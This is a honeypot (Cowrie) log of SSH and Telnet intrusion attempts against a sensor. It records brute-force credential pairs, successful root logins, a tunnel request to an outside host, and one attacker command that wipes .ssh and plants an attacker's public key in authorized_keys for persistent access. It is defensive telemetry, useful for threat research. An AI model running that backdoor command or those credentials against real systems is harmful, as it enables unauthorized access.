{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39322,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1f8f0ccc62e","protocol":"ssh","message":"New connection: 212.227.235.229:39322 (1.2.3.4:22) [session: f1f8f0ccc62e]","sensor":"my-vps","timestamp":"2025-08-26T03:27:48.698527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:27:48.699241Z","src_ip":"212.227.235.229","session":"f1f8f0ccc62e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:27:48.940852Z","src_ip":"212.227.235.229","session":"f1f8f0ccc62e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:27:49.955150Z","src_ip":"212.227.235.229","session":"f1f8f0ccc62e"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:27:50.190345Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:27:50.199033Z","src_ip":"212.227.235.229","session":"f1f8f0ccc62e"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":38900,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bc7b2fbb467","protocol":"ssh","message":"New connection: 93.123.109.181:38900 (1.2.3.4:22) [session: 8bc7b2fbb467]","sensor":"my-vps","timestamp":"2025-08-26T03:28:40.853693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:28:40.854646Z","src_ip":"93.123.109.181","session":"8bc7b2fbb467"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T03:28:40.873960Z","src_ip":"93.123.109.181","session":"8bc7b2fbb467"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solv321","message":"login attempt [solv/solv321] failed","sensor":"my-vps","timestamp":"2025-08-26T03:28:40.932972Z","src_ip":"93.123.109.181","session":"8bc7b2fbb467"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44576,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d159d6f3276","protocol":"ssh","message":"New connection: 212.227.235.229:44576 (1.2.3.4:22) [session: 2d159d6f3276]","sensor":"my-vps","timestamp":"2025-08-26T03:28:41.725156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:28:41.726187Z","src_ip":"212.227.235.229","session":"2d159d6f3276"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:28:41.953281Z","src_ip":"93.123.109.181","session":"8bc7b2fbb467"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:28:42.010648Z","src_ip":"212.227.235.229","session":"2d159d6f3276"}
{"eventid":"cowrie.login.failed","username":"user","password":"user!@#","message":"login attempt [user/user!@#] failed","sensor":"my-vps","timestamp":"2025-08-26T03:28:43.253366Z","src_ip":"212.227.235.229","session":"2d159d6f3276"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39786,"dst_ip":"1.2.3.4","dst_port":22,"session":"10dc430884e9","protocol":"ssh","message":"New connection: 212.227.235.229:39786 (1.2.3.4:22) [session: 10dc430884e9]","sensor":"my-vps","timestamp":"2025-08-26T03:29:35.700942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:29:35.702055Z","src_ip":"212.227.235.229","session":"10dc430884e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:29:41.702630Z","src_ip":"212.227.235.229","session":"10dc430884e9"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:29:41.704514Z","src_ip":"212.227.235.229","session":"10dc430884e9"}
{"eventid":"cowrie.session.connect","src_ip":"38.159.64.169","src_port":46909,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9182d769f7d","protocol":"telnet","message":"New connection: 38.159.64.169:46909 (1.2.3.4:23) [session: c9182d769f7d]","sensor":"my-vps","timestamp":"2025-08-26T03:30:07.026570Z"}
{"eventid":"cowrie.session.closed","duration":31.694721698760986,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:30:38.721187Z","src_ip":"38.159.64.169","session":"c9182d769f7d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:30:41.727415Z","src_ip":"212.227.235.229","session":"2d159d6f3276"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54832,"dst_ip":"1.2.3.4","dst_port":22,"session":"f60b5ca231c0","protocol":"ssh","message":"New connection: 217.72.205.35:54832 (1.2.3.4:22) [session: f60b5ca231c0]","sensor":"my-vps","timestamp":"2025-08-26T03:30:55.759124Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:30:55.760200Z","src_ip":"217.72.205.35","session":"f60b5ca231c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45735,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7da0edccf0c","protocol":"ssh","message":"New connection: 212.227.125.160:45735 (1.2.3.4:22) [session: b7da0edccf0c]","sensor":"my-vps","timestamp":"2025-08-26T03:30:57.551171Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:30:57.552505Z","src_ip":"212.227.125.160","session":"b7da0edccf0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46001,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5ef5d19ee9f","protocol":"ssh","message":"New connection: 212.227.125.160:46001 (1.2.3.4:22) [session: e5ef5d19ee9f]","sensor":"my-vps","timestamp":"2025-08-26T03:30:57.665903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:30:57.666576Z","src_ip":"212.227.125.160","session":"e5ef5d19ee9f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T03:30:57.782388Z","src_ip":"212.227.125.160","session":"e5ef5d19ee9f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:30:58.130492Z","src_ip":"212.227.125.160","session":"e5ef5d19ee9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T03:30:58.247735Z","session":"e5ef5d19ee9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57800,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a7f98eb09be","protocol":"ssh","message":"New connection: 212.227.235.229:57800 (1.2.3.4:22) [session: 1a7f98eb09be]","sensor":"my-vps","timestamp":"2025-08-26T03:31:06.585602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:31:06.586566Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:31:09.869080Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123..","message":"login attempt [root/admin123..] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:31:10.624918Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:31:11.149929Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:31:11.150625Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:31:11.151548Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:31:11.403794Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:31:12.004216Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:31:12.005085Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:31:12.258033Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:31:12.259081Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38102,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c9796b2a6e4","protocol":"ssh","message":"New connection: 212.227.235.229:38102 (1.2.3.4:22) [session: 7c9796b2a6e4]","sensor":"my-vps","timestamp":"2025-08-26T03:31:12.506364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:31:12.507156Z","src_ip":"212.227.235.229","session":"7c9796b2a6e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:31:13.733430Z","src_ip":"212.227.235.229","session":"7c9796b2a6e4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:31:14.484516Z","src_ip":"212.227.235.229","session":"7c9796b2a6e4"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:31:15.737359Z","src_ip":"212.227.235.229","session":"7c9796b2a6e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38104,"dst_ip":"1.2.3.4","dst_port":22,"session":"c669230a60d9","protocol":"ssh","message":"New connection: 212.227.235.229:38104 (1.2.3.4:22) [session: c669230a60d9]","sensor":"my-vps","timestamp":"2025-08-26T03:31:15.997600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:31:15.998699Z","src_ip":"212.227.235.229","session":"c669230a60d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:31:17.233087Z","src_ip":"212.227.235.229","session":"c669230a60d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:31:18.001891Z","src_ip":"212.227.235.229","session":"c669230a60d9"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:31:18.257258Z","src_ip":"212.227.235.229","session":"1a7f98eb09be"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:31:18.259187Z","src_ip":"212.227.235.229","session":"c669230a60d9"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":58364,"dst_ip":"1.2.3.4","dst_port":22,"session":"065448faad81","protocol":"ssh","message":"New connection: 45.88.8.215:58364 (1.2.3.4:22) [session: 065448faad81]","sensor":"my-vps","timestamp":"2025-08-26T03:31:38.517027Z"}
